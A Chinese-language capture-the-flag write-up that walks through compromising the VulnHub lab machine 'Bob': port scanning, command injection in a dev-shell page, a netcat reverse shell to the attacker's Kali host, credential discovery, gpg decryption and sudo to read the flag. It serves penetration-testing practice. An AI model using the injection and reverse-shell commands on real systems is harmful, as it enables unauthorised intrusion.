每周靶机之bob
总之这是这周的靶机
环境设置
攻击机:kali(192.168.246.128)
靶机:bob (192.168.246.138)
使用工具&指令&知识
nc(瑞士军刀)
nmap (端口扫描)
gpg加密
命令执行漏洞
具体过程
首先国际惯例
arp-scan -l //发现同网段设备
nmap -A -p- [ip地址] //扫描该ip的端口并使用默认脚本
发现了该靶机开放了21端口(对应ftp服务) 80端口(对应http服务) 25468端口(对应ssh服务)
我们先从http服务开启 firefox访问
主页与超链接经检查 没有发现什么特别的东西
于是我们来看看nmap在/robots.txt下扫描出的四个目录
什么是robots.txt
robots.txt是网站管理者写给爬虫的一封信,里面描述了网站管理者不希望爬虫做的事,比如:
- 不要访问某个文件、文件夹
- 禁止某些爬虫的访问
- 限制爬虫访问网站的频率
一个自觉且善意的爬虫,应该在抓取网页之前,先阅读robots.txt,了解并执行网站管理者制定的爬虫规则。
发现dev-shell目录中存在命令执行漏洞 既使用 管道符| 来执行nc相关命令
在kali上执行nc -lnvp 1234 //指定1234端口开始监听
运用命令行输入w|nc -e /bin/sh [kali的ip] [指定端口]
随后反弹shell成功
首先 反弹到的shell页面不是很易懂 我们可以使用python -c 'import pty; pty.spawn("/bin/bash")'
来创建一个伪终端 方便后面的操作
根据该作者在vulnhub上的提示 flag文件位于**/目录
但权限不够 我们需要提权
先根据我们对该靶机的推测 在/home/bob中寻找线索
发现了一个.old_passwordfile.html**
查看后是两对密码和账号
我们通过ssh链接来分别测试这些账号密码
很好 jc账号的密码正确 链接了靶机
再次在/home/bob下寻找线索 发现/Documents下有一个名为secret的文件夹和一个经过gpg加密的文件login.txt 需要密码
我们使用ls -alR // -R 递归显示所有子文件夹和其中的文件
查看
有一个notes.sh文件 我们查看其中的内容
前言不搭后语的 但第一个字母都着重大写了 并且是一个单词 我们把它当作藏头诗理解 尝试解密先前的gpg文件gpg --output [输出文件名] --decrypt [需要解密的文件名]
输入密码HARPOCRATES(你可别说这页面还挺炫)
解密出来又是一套账号密码
再次登录 发现这次的账号有sudo权限
那很方便了 利用sudo查看该flag文件
结束!
总结
较为简短的靶机 结合了gpg加密与命令执行漏洞的知识
学无止境 期待下次的靶机